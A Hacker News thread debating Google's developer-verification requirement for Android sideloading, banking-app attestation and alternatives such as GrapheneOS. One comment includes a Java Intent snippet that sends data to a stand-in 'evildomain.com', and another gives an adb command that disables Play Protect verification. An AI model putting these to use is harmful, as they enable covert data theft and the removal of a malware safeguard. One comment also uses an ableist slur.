And Google stopped providing device trees and driver binaries... and stopped releasing AOSP as often, and, and...
numpad0 · 1h ago
The number of people able to do that is fewer than those willing to send in copies of overnment IDs. Phones compatible with AOSP builds are rare outside small bubbles of Pixel users as well.
cyanydeez · 2h ago
I mean, you're pretty optimistic that the current fascism is going away any time soon.
pessimizer · 2h ago
> the people get so angry that they are forced to roll this back.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
rockemsockem · 2h ago
If enough people internal at Google get pissed off and raise this up enough it can legitimately get rolled back.
asdff · 2h ago
They will just get sacked for sycophants either here or abroad. For every principled worker there is, there is another person willing to eschew those principles for that paycheck. This is a desperate world by design to enable these tradeoffs by the very people who build, maintain, deploy, and ultimately control the worlds systems.
saubeidl · 2h ago
A better world is possible. Rise up, workers! You have nothing to lose but your chains!
abeyer · 2h ago
and your salary
saubeidl · 1h ago
If the workers rise up properly, they can reposses oligarch riches instead!
abeyer · 1h ago
History has seemed to show the only likely outcome is the violent redistribution of riches from one set of oligarchs to another.
achierius · 41m ago
Based on what? Sure quips like that are catchy, but what "oligarchs" were there in the Soviet Union circa 1920-1989? The "nomenklatura", while well-off, were absolutely nowhere near the wealth of today's American oligarchs or modern (capitalist) Russian ones. Moreover, unlike oligarchs, they do not form a class: wealth does not transfer reliably one generation to the next, and individuals would phase in and out of high status according to their position in their career.
A very striking way to illustrate this is to look at the career histories of high government officials even very late into the Soviet Union. The last Minister of Coal, Mikhail Shchadov, was born in a village, worked in a mine, went to mining school for engineering, became head of his mine, and thereafter worked his way up the ranks until he was head of the whole apparatus. This story, not that of inherited wealth or monopolistic oligarchs, dominates the histories of Soviet ministers even very late in the decline of the Union.
Where is the "other set" of oligarchs of which you speak? There is none, which means there is hope for workers who might wish to enact fundamental economic change.
gumby271 · 27m ago
You mean the people actively building this system? I have to assume it's decently far along for them to make this announcement.
glenstein · 58m ago
Agree and disagree: the pressure on unity worked, and Sonos and, IIRC on Google's "federated cohorts" idea.
But often people try to project their opinions onto "the people" and predict they will rise up, and there's probably 100 predictions in comment sections that are completely spurious to every one that actually happens
So I'm not sure, but if I had to guess this one is a rare case where there may be real prospect of backlash.
logicchains · 3h ago
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
tgsovlerkhgsel · 3h ago
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
fluoridation · 2h ago
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
opan · 9m ago
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
endgame · 1h ago
It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.
nunclieh · 2h ago
>live like an outcast that can't access essential services?
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
kovac · 1h ago
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
jazzyjackson · 2h ago
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
itsanaccount · 3h ago
> live like an outcast
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
01HNNWZ0MV43FF · 2h ago
I've been doing it. That's why I'm vegan.
rockemsockem · 2h ago
I'm sorry, this is such a funny follow up comment, I literally lol-ed when I got to it.
itsanaccount · 2h ago
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
echelon_musk · 54m ago
> _I'm not growing tofu on the farm_
What else are you growing?
busymom0 · 3h ago
What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.
out_of_protocol · 3h ago
Can't access banks, ticket systems etc. unfortunately we are in the era of tightened screws, the freedom is running out :(
eraviloi · 2h ago
Lol all these things work via the web. You just log on via the browswer. Not everything needs an app.
homebrewer · 1h ago
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
nunclieh · 2h ago
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Y_Y · 1h ago
> physical maps
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
goda90 · 2h ago
Aren't there attestation frameworks under development that they could start using too?
kovac · 1h ago
The 2FAs require their mobile app sometimes.
achrono · 2h ago
Other than banks & ticketing, there is a whole host of things that do in fact need an app.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
A4ET8a8uTh0_v2 · 1h ago
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
homebrewer · 1h ago
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
GuinansEyebrows · 2h ago
you can usually just use the web-interfaces for those services. less convenient, sure, but the options are there.
logicchains · 3h ago
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.
jraph · 2h ago
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
thyristan · 2h ago
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
outofpaper · 2h ago
You can side load three apps at a time outside the EU and unlimited inside the EU.
vachina · 2h ago
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
A locked-down Android is pointless.
homebrewer · 1h ago
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
gigel82 · 3h ago
I'm curious what you think the alternative is, because Apple is definitely a lot worse, and we all know they're very much a duopoly.
BTW, all the GrapheneOS, etc. are still Android phones.
goda90 · 3h ago
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
mysteria · 3h ago
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
Zak · 3h ago
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
steve_taylor · 57m ago
There are many third-party money apps that login to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
afandian · 2h ago
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
thrtythreeforty · 3h ago
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
codethief · 1h ago
I have been a GrapheneOS user since the Pixel 3 and have yet to encounter an app that doesn't work on GOS.
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
42lux · 2h ago
It's really nice when you first use it but if you have to use it as a daily driver it's pure pain. Rather go for graphene.
anonym29 · 3h ago
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
opan · 5m ago
In addition to the PinePhone and Librem 5, you can also put postmarketOS on some faster Android phones like the OnePlus 6T.
RedComet · 2h ago
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
wishfish · 1h ago
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
thyristan · 2h ago
Even with this change, Android is still more free than iOS by far.
matheusmoreira · 1h ago
Utterly pointless.
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryprographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
rkagerer · 3h ago
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
fzeindl · 4m ago
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
miloignis · 2h ago
GrapheneOS + F-Droid is a joy to use, for me. I'm kinda shocked when I use anyone else's phone, now.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
emidoots · 2h ago
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
A web browser in the worst case scenario. The same way you'd do it on a computer.
debazel · 2h ago
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my banks app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
markasoftware · 28m ago
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
Pxtl · 33m ago
Android apps will be the IE6 activeX controls of the future.
GeoAtreides · 1h ago
Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose
jiggunjer · 22m ago
Then use a laptop instead? Or you have one of those "modern" banks that's app only?
ethagnawl · 2h ago
What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.
bogwog · 2h ago
As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.
rcxdude · 1h ago
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
anticrymactic · 1h ago
Most banking app work, either directly or with a settings change to allow Google Play Service emulation. [1]
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely.
Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
Pxtl · 36m ago
Uh, my bank has a pretty good mobile website, personally.
foobar47859 · 2h ago
Vollo from German is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
margalabargala · 2h ago
For once Fairphone never updating their phones will work in our favor! If Google roll sthis out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
worldsayshi · 1h ago
> Fairphone never updating their phones
I have a Fairphone and i get updates pretty frequently so not sure what you mean?
margalabargala · 1h ago
What major version of Android are you on? Last I checked (a few months ago) all Fairphones were still on Android 13.
You can enjoy “good old days” from what you remember of iOS and android.
I also say enjoy the LLM good new days while they last.
steve_taylor · 54m ago
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
indrora · 2h ago
Windows 10 Mobile was good.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
toast0 · 2h ago
The developer experience was trash.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
Hilift · 2h ago
Mobile in general is a second class ecosystem. You're paying to ride in a bus that most ride for free, and when you sit down it's squishy.
userbinator · 1m ago
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
hn8726 · 3h ago
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
ocdtrekkie · 2h ago
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
mysteria · 3h ago
The article didn't say much about the account approval process, but from the looks of it Google will be able to arbitrarily accept and revoke applications as they see fit. So much for an open platform, bring forth the gatekeeping!
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
fph · 2h ago
That's the first step toward banning NSFW apps like on Steam, I'm afraid.
abeyer · 2h ago
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
luke-stanley · 2h ago
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to setup Android signing keys and needing to provide ID is not fun.
It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
abeyer · 2h ago
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
luke-stanley · 2h ago
They are namespacing, like it or not, and clearly they don't care about open-source that much.
EMIRELADERO · 4h ago
So that's it then.
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
CalRobert · 4h ago
In time, you will only be able to access banking from your desktop using an approved OS and browser with attestation...
ffsm8 · 3h ago
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
saurik · 1h ago
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
crvdgc · 1h ago
A recent real life example:
You can apply for an HSBC Global Money Account if you have:[…]The HSBC UK Mobile Banking app (Global Money is only available via the app)
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
slyzmud · 1h ago
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
BLKNSLVR · 44m ago
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
al_borland · 55m ago
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Pxtl · 18m ago
i do like how many apps are starting to play nice with 3rd party authenticators. i use ms authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
tgsovlerkhgsel · 3h ago
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
arp242 · 2h ago
Not true for either my AIB or Wise account.
zeta0134 · 1h ago
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
int_19h · 44m ago
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
arp242 · 1h ago
I mean, I'm sure it's true for some banks or financial services, but that's not really the same thing.
Night_Thastus · 2h ago
A dedicated app on a locked down OS is vastly more controllable than something like a browser that can do virtually whatever it wants.
tremon · 1h ago
Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.
prism56 · 3h ago
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
UncleMeat · 2h ago
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
gumby271 · 2h ago
Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.
UncleMeat · 30m ago
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
zozbot234 · 3h ago
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
A4ET8a8uTh0_v2 · 1h ago
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
black3r · 2h ago
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
baby_souffle · 3h ago
Can you elaborate a little bit about this hidden internet access control setting?
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
9cb14c1ec0 · 1h ago
Even device owner (MDM) apps can't revoke that permission.
fph · 1h ago
You can deny it on Graphene OS.
87636899376 · 3h ago
"Hidden" isn't exactly right. It's completely inaccessible, unless you use a custom ROM like LineageOS. But it is a real permission:
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
tgsovlerkhgsel · 3h ago
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
87636899376 · 3h ago
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
GuB-42 · 1h ago
> I've never managed to find even a single PoC bypassing it
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
broker354690 · 1h ago
> would be a catastrophic change to the ecosystem.
Hey we were already on board with this, you don't have to convince us.
UncleMeat · 27m ago
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
zrobotics · 2h ago
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
chenxiaolong · 4h ago
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
adb shell settings put global package_verifier_user_consent -1
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
mzajc · 2h ago
How long until Google decides to lock it down because "scammers" can "abuse" it?
prism56 · 3h ago
What does this break?
chenxiaolong · 3h ago
There shouldn't be any side effects other than rendering Play Protect inert. No other AOSP component relies on this setting.
zozbot234 · 3h ago
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
ezconnect · 1h ago
Some bank apps and payment processor already check if you have developer mode on and refuses to run.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
WorldPeas · 1h ago
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
beeflet · 7m ago
eternal september
mrlatinos · 59m ago
